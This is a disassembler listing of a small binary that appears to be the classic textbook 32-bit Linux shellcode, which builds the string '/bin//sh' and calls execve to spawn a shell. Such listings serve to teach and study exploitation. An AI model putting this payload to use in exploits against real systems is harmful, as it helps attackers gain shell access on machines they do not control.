
sc_example.bin:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	31 c0                	xor    eax,eax
   2:	50                   	push   eax
   3:	68 6e 2f 73 68       	push   0x68732f6e
   8:	68 2f 2f 62 69       	push   0x69622f2f
   d:	89 e3                	mov    ebx,esp
   f:	50                   	push   eax
  10:	89 e2                	mov    edx,esp
  12:	53                   	push   ebx
  13:	89 e1                	mov    ecx,esp
  15:	b0 0b                	mov    al,0xb
  17:	cd 80                	int    0x80
  19:	0a                   	.byte 0xa
